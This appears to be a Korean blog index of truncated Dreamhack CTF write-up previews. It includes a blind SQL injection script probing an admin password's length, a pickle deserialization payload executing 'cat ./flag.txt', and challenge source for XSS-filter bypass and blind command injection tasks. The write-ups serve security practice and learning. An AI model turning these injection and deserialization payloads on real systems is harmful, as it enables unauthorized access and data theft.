1레벨의 간단한 문제이다. from requests import get password_length = 0 while True: password_length += 1 query = f"and char_length(upw) = {password_length}-- -" r = get(f"http://host3.dreamhack.games:11328/?uid=admin'{query}") print(r.text) if "exist" in r.text: break print(f"passwordlength = {password_length}") 블라인드 sql 인젝션은 그 특수성때문에 password를 바로 찾아낼수 없다. 따라서 첫번째로, password 길이를 알아낸다. 길이는 13자리가 나온다. from re..

레벨 1의 워밍업 문제이다. 개인적으로는 어느정도의 구글링과 코딩능력을 요구한다고 생각한다. /index.html 이다. 별건 없다. 위에 적힌 create session으로 들어가보자 Name userid password 를 입력할 수 있는 form이 주어진다. create session에서 name,userid,password를 입력하면 세션이 base64로 발급된다. check session에서는 그 세션을 기입하면 위와 같이 정보가 serialization 화 된다. import pickle, os, base64 class Vuln(object): def __reduce__(self): command = "os.popen('cat ./flag.txt').read()" return (eval, (c..

보호되어 있는 글입니다.

레벨 1, 웹 해킹 분야의 XSS Filtering Bypass 라는 문제이다. 난이도도 1레벨이고 본 문제의 강의도 로드맵에 존재하는것을 보아 많이 어려운 문제는 아닌듯 하다. from flask import Flask, request, render_template from selenium import webdriver import urllib import os app = Flask(__name__) app.secret_key = os.urandom(32) try: FLAG = open("./flag.txt", "r").read() except: FLAG = "[**FLAG**]" def read_url(url, cookie={"name": "name", "value": "value"}): cookie..

난이도는 2렙, 웹 해킹 분야의 blind command 라는 문제다. 우선 링크에 접속하면 ?cmd=[cmd] 라는 문구만 주어진다. 이를 통해 파라미터를 통해 커맨드를 주입 시킬수 있다는 것을 유추 해볼 수 있다. 하지만 커맨드들이 서버에서 실행 되지 않고 그냥 출력된다. 이때, 소스코드를 확인하면 #!/usr/bin/env python3 from flask import Flask, request import os app = Flask(__name__) @app.route('/' , methods=['GET']) def index(): cmd = request.args.get('cmd', '') if not cmd: return "?cmd=[cmd]" if request.method == 'GET':..